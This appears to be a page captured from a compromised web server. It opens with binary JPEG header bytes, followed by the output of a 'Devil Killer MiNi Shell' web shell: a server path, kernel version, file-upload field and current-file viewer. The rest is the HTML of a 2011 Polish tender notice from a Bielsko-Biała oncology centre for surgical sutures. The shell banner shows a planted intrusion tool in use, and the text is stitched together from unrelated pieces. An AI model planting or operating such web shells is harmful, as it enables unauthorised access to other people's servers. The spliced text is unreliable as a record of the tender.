JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111129/402382-N-2011.html

<p class="kh_header"><b>Bielsko-Biała: Dostawa  nici chirurgicznych dla  potrzeb  Beskidzkiego Centrum Onkologii im. Jana Pawła II</b><br>
<b>Numer ogłoszenia: 402382 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Beskidzkie Centrum Onkologii im. Jana Pawła II , ul. Wyzwolenia 18, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8164061, faks 033 8164401, 4984042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.onkologia.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  nici chirurgicznych dla  potrzeb  Beskidzkiego Centrum Onkologii im. Jana Pawła II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, w ramach wyodrębnionych zadań (pakietów)  nici chirurgicznych oraz siatek przepuklinowych dla potrzeb Beskidzkiego Centrum Onkologii w Bielsku-Białej, w asortymencie i ilościach określonych szczegółowo w załączniku nr 5 do siwz.   Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6 do siwz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający wymaga złożenia:
a)	stosownego wykazu wykonanych  dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem stosownych  dokumentów (np. referencji)  potwierdzających, że  dostawy te zostały wykonane należycie.    - do każdego wykazanego zamówienia powinny być załączone dokumenty potwierdzające, że dostawy te zostały wykonane należycie. Dla Zamawiającego warunkiem wystarczającym będzie  wykazanie wykonania w w/w okresie co najmniej dwóch zamówień na dostawę nici chirurgicznych  potwierdzonych stosownymi dokumentami, że zostały one wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Warunki uprawniające do udziału w postępowaniu:
O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1.	 Spełnią warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy dotyczące:
-	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek  ich posiadania;
-	 posiadania wiedzy i doświadczenia;
-	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-	sytuacji ekonomicznej i finansowej;
Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia:
a)	  stosownego oświadczenia z art. 22 ust. 1  ustawy Prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.

2.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.

3.	Posiadają wiedzę i doświadczenie
Na potwierdzenie warunku Zamawiający wymaga złożenia:
a)	stosownego wykazu wykonanych  dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem stosownych  dokumentów (np. referencji)  potwierdzających, że  dostawy te zostały wykonane należycie.    - do każdego wykazanego zamówienia powinny być załączone dokumenty potwierdzające, że dostawy te zostały wykonane należycie. Dla Zamawiającego warunkiem wystarczającym będzie  wykazanie wykonania w w/w okresie co najmniej dwóch zamówień na dostawę nici chirurgicznych  potwierdzonych stosownymi dokumentami, że zostały one wykonane należycie.

4.	Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.

5.	Sytuacja ekonomiczna i finansowa
Na potwierdzenie warunku Zamawiający nie wymaga złożenia dodatkowego dokumentu.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w pkt 2 - 5 winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie. 
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie (pkt 1) o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie. 
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wykonawca powołujący się na potencjał innych podmiotów w zakresie doświadczenia zobowiązany jest do wykazania spełniania warunku poprzez wskazanie części zamówienia, jaką powierzy podwykonawcom.

6.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodu okoliczności, o których mowa w art. 24 ust. 1 ustawy.
Na potwierdzenie warunku Zamawiający wymaga złożenia:
a)	 stosownego oświadczenia z art. 24 ust. 1 ustawy Prawo zamówień publicznych o braku podstaw do wykluczenia - wg wzoru stanowiącego załącznik nr 3 do siwz. 
b)	aktualnego odpisu z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy (załącznik nr 3 do siwz)

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w pkt 6.a) i b)  powinien spełniać każdy z Wykonawców samodzielnie.

7.	Spełnią warunki dodatkowe.
-	złożą  wypełniony formularz asortymentowo-cenowy (dla wybranego zadania);
-	złożą wypełniony załącznik nr 6 do siwz - Walory techniczne przedmiotu zamówienia (dla wybranego zadania) - dotyczy ofert składanych na pakiety od nr 1 do nr 8
-	zaoferują 30 dniowy termin płatności za wykonaną dostawę; 
-	zagwarantują, że termin ważności oferowanych  produktów nie będzie krótszy niż 6 miesięcy, licząc od daty dostarczenia ich do Zamawiającego;
-	przedstawią stosowne  oświadczenie potwierdzające, że wszystkie  oferowane  wyroby będące wyrobami     medycznymi  spełniają   Rozporządzenie Ministra Zdrowia z dnia  12 stycznia 2011r. (Dz. U. 2011 nr 16 poz. 74)  w  sprawie wymagań zasadniczych oraz procedur oceny zgodności wyrobów  medycznych oraz że spełniają wymagania ustawy z dnia 20 maja 2010r. o wyrobach medycznych (Dz.U. 2010 nr 107, poz. 679 z późń. zm.), ponadto że  są oznakowane znakiem CE i  posiadają ważną deklarację zgodności CE. (wraz z kopia deklaracji zgodności CE)
-	dostarczą wraz  z ofertą np. w oddzielnej kopercie/kartonie następujące próbki nici chirurgicznych: po 5 szt. próbek z pozycji nr 7 i 14  pakietu nr 1, po 5 szt. próbek z pozycji nr 7 pakietu nr 2, po 5 szt. próbek z pozycji nr 2 pakietu nr 3, po 5 szt. próbek z pozycji nr 3 pakietu nr  4, po 5 szt. próbek z pozycji nr 3 pakietu nr 5, po 5 szt. próbek z pozycji nr 3 pakietu nr 6,  po 5 szt. próbek z pozycji nr 4 pakietu nr 7, po 5 szt. próbek z pozycji nr 2 pakietu nr  8, po 5 szt.  próbek z pozycji nr 2 pakietu nr 9.  Do wymaganych próbek należy dołączyć informację w formie ulotki o ile informacje te nie są umieszczone na opakowaniu/saszetce zawierające dane producenta, opis zawierający wskazania producenta co do właściwości przedmiotu zamówienia, zasad bezpieczeństwa użytkowania i terminów ważności.

Na potwierdzenie spełnienia tych warunków Zamawiający wymaga złożenia:
a)	wypełnionego formularza asortymentowo-cenowego (dla wybranego zadania) - wg wzoru stanowiącego załącznik nr 5 do siwz
b)	wypełnionego załącznika nr 6 do siwz - walory techniczne przedmiotu zamówienia (dla wybranego zadania) - dotyczy ofert składanych na pakiety od nr 1 do nr 8
c)	wypełnionego formularza ofertowego - wg wzoru stanowiącego  załącznik nr 1 do siwz
d)	stosownego  oświadczenia potwierdzającego, że wszystkie  oferowane  wyroby będące wyrobami     medycznymi  spełniają   Rozporządzenie Ministra Zdrowia z dnia  12 stycznia 2011r. (Dz.U. 2011 nr 16 poz. 74)  w  sprawie wymagań zasadniczych oraz procedur oceny zgodności wyrobów  medycznych oraz że spełniają wymagania ustawy z dnia 20 maja 2010r. o wyrobach medycznych (Dz.U. 2010 nr 107, poz. 679 z późń. zm.), ponadto że  są oznakowane znakiem CE i  posiadają ważną deklarację zgodności CE. (wraz z kopią deklaracji zgodności CE).
e)	następujących próbek nici chirurgicznych:  po 5 szt. próbek z pozycji nr 7 i 14  pakietu nr 1, po 5 szt. próbek z pozycji nr 7 pakietu nr 2, po 5 szt. próbek z pozycji nr 2 pakietu nr 3, po 5 szt. próbek z pozycji nr 3 pakietu nr  4, po 5 szt. próbek z pozycji nr 3 pakietu nr 5, po 5 szt. próbek z pozycji nr 3 pakietu nr 6,  po 5 szt. próbek z pozycji nr 4 pakietu nr 7, po 5 szt. próbek z pozycji nr 2 pakietu nr  8, po 5 szt.  próbek z pozycji nr 2 pakietu nr 9.  Do wymaganych próbek należy dołączyć informację w formie ulotki o ile informacje te nie są umieszczone na opakowaniu/saszetce zawierające dane producenta, opis zawierający wskazania producenta co do właściwości przedmiotu zamówienia, zasad bezpieczeństwa użytkowania i terminów ważności.

Uwaga:  Po wykorzystaniu próbek Zamawiający postąpi z nimi  tak jak z materiałem zakaźnym tzn. odda je do utylizacji.


W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego dokumenty i oświadczenia, o których mowa w pkt  7 a) -  e) składa co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie.
Ocena spełnienia określonych wyżej warunków zostanie dokonana na podstawie złożonych przez 
Wykonawcę dokumentów, w tym oświadczeń, określonych w treści siwz. Zamawiający sprawdzi kompletność oświadczeń i dokumentów a następnie dokona sprawdzenia spełnienia warunków wg zasady spełnia (+) / niespełnia (-), co musi wynikać jednoznacznie z treści tych oświadczeń i dokumentów. Wykonawca, który nie spełni   warunków uprawniających do udziału w postępowaniu, o których mowa w pkt. 1.a), 3 a), 6.a) i b) zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą,  natomiast   oferta  Wykonawcy,  który  nie spełni warunków, o których mowa w pkt. 7. a), b), c),d) i e)   zostanie odrzucona.

1.	Wypełniony formularz ofertowy - wg wzoru stanowiącego załącznik nr 1 do siwz.
2.	Oświadczenie z art. 22 ust 1 ustawy prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do siwz.
3.	Oświadczenie z  art. 24 ust 1 ustawy prawo zamówień publicznych o braku podstaw do wykluczenia - wg wzoru stanowiącego załącznik nr 3 do siwz.
4.	Wypełniony formularz asortymentowo-cenowy ( dla wybranego zadania) - wg wzoru stanowiącego załącznik nr 5 do siwz.
5.	Wypełniony załącznik nr 6 do siwz - walory techniczne przedmiotu zamówienia (dla wybranego zadania) - dotyczy ofert składanych na pakiety od nr 1 do nr 8.
6.	Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru wystawiony nie   
     wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych   
      oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy (załącznik nr 3 do siwz).
7.	Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo 
reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - udzielone osobom nie wymienionym w dokumencie, o którym mowa w pkt 6 a reprezentującym Wykonawcę,  w szczególności poprzez podpisywanie/poświadczanie dokumentów składających się na ofertę oraz innych składanych w toku postępowania.
8.	Wykaz wykonanych  dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem stosownych  dokumentów (np. referencji)  potwierdzających, że  dostawy te zostały wykonane należycie.    - do każdego wykazanego zamówienia powinny być załączone dokumenty potwierdzające, że dostawy te zostały wykonane należycie.  Dla Zamawiającego warunkiem wystarczającym będzie  wykazanie wykonania w w/w okresie co najmniej dwóch zamówień na dostawę nici chirurgicznych  potwierdzonych stosownymi dokumentami, że zostały one wykonane należycie.
9.	Oświadczenie potwierdzające, że wszystkie  oferowane  wyroby będące wyrobami     medycznymi  spełniają   Rozporządzenie Ministra Zdrowia z dnia  12 stycznia 2011r. (Dz.U. 2011 nr 16 poz. 74)  w  sprawie wymagań zasadniczych oraz procedur oceny zgodności wyrobów  medycznych oraz że spełniają wymagania ustawy z dnia 20 maja 2010r. o wyrobach medycznych (Dz.U. 2010 nr 107, poz. 679 z późń. zm.), ponadto że  są oznakowane znakiem CE i  posiadają ważną deklarację zgodności CE. (wraz z kopią deklaracji zgodności CE).
10.	Próbki wraz z informacją i opisem, o których mowa w warunkach uprawniających do udziału w postępowaniu pkt 7 ppkt e) w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego. 
    Uwaga:  Po wykorzystaniu próbek Zamawiający postąpi z nimi  tak jak z materiałem zakaźnym tzn.    
    odda je do utylizacji.
11.Pisemne zobowiązanie innych podmiotów zgodnie z art. 26 ust. 2 b) ustawy do oddania do   
     dyspozycji     Wykonawcy niezbędnych zasobów (wiedza, doświadczenie, potencjał techniczny,   
     osoby zdolne do  wykonania zamówienia oraz zdolności finansowe) na okres korzystania z nich przy 
     wykonywaniu zamówienia - dotyczy Wykonawców, którzy polegają na wiedzy, doświadczeniu, 
    potencjale  technicznym i osobach  zdolnych  do wykonania zamówienia oraz zdolnościach 
    finansowych innych  podmiotów.
12.W przypadku dokumentów o których mowa w pkt  3 i 6  innych podmiotów,  na  okoliczność gdy 
      Wykonawca będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 
     2b) ustawy Zamawiający żąda tych dokumentów, tylko wtedy gdy podmioty będą brały udział w 
     realizacji części zamówienia. W przypadku kiedy podmiot trzeci nie będzie brał udziału w realizacji 
     zamówienia lecz  udostępni swoje zasoby np. (sprzęt, pracowników) Zamawiający nie żąda tych 
     dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>szczegółowo opisane w załączniku nr 4 do siwz projekcie umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.onkologia.bielsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43-300  Bielsko-Biała, ul. Wyzwolenia 18 (Budynek Dyrekcji - Komórka Zamówień Publicznych)   pisemnie w cenie 15 zl + VAT, strona internetowa bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 10:00, miejsce: 43-300  Bielsko-Biała, ul. Wyzwolenia 18 (Budynek Dyrekcji - sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami upoważnionymi do kontaktowania się z Wykonawcami są:
Kierownik Apteki  - dr n. farm. Jolanta Paździora  tel.  (033) 498 40 43
Oddziałowa Bloku Operacyjnego - mgr Bogusława Kupczak - Wiśniowska tel. (033)  498 40 38
 Specjalista ds. Zamówień Publicznych - mgr Aurelia Wójcik tel. (033) 498 40 42.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
